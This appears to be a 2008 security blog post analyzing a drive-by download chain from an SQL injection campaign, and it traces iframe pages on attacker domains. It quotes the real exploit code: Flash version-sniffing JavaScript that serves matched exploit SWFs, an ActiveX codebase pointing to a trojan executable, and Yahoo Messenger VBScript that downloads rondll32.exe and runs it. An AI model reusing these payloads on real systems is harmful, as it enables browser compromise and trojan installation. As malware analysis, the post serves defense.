Archive for August 6, 2008

jjmaobuduo.3322.org/csrss/w.js

Posted in sql injection on August 6, 2008 by s3cu

a new round of attacks haveĀ  started.
w.js contains iframe src from http://www.plgou.com/csrss/htm.htm
htm.htm contains iframes from

  • <iframe src=flash.htm width=100 height=0></iframe>
  • <iframe src=06014.html width=100 height=0></iframe>
  • <iframe src=yahoo.htm width=100 height=0></iframe>
  • <iframe src=office.htm width=100 height=0></iframe>
  • <iframe src=ksx.htm width=100 height=0></iframe>

flash.htm calls i1.html if browser is MSIE, else call f2.html (presumably firefox). Depending on the flashplay version the respective flash exploit is retrieved:

var version=deconcept.SWFObjectUtil.getPlayerVersion();if(version['major']==9){document.getElementById('flashversion').innerHTML="";if(version['rev']==115){var so=new SWFObject("./i115.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(version['rev']==64){var so=new SWFObject("./i64.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(version['rev']==47){var so=new SWFObject("./i47.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(version['rev']==45){var so=new SWFObject("./i45.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(version['rev']==28){var so=new SWFObject("./i28.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(version['rev']==16){var so=new SWFObject("./i16.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(version['rev']>=124){if(document.getElementById){document.getElementById('flashversion').innerHTML=""}}}
document.write("")

Interesting content for ksx.htm:
<object classid="clsid:7E0CDEE7-DC80-4F37-9410-790BB5E9270E" codebase="http://www.plgou.com/csrss/rondll32.exe#version=1,0,0,1" width="800" height="191"></object>

infrequently used clsid for downloading trojan.

office.htm contains snapshot viewer exploit.

yahoo.htm uses exploits Yahoo Messenger to download trojan:

<object classid='clsid:24F3EAD6-8B87-4C1A-97DA-71C126BDA08F' id='test'></object>
<script language='vbscript'>
test.GetFile "http://www.plgou.com/csrss/rondll32.exe","c:\\msyahoo.exe",5,1,"ti
any"
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run"c:\\msyahoo.exe"
</script>

4 Comments »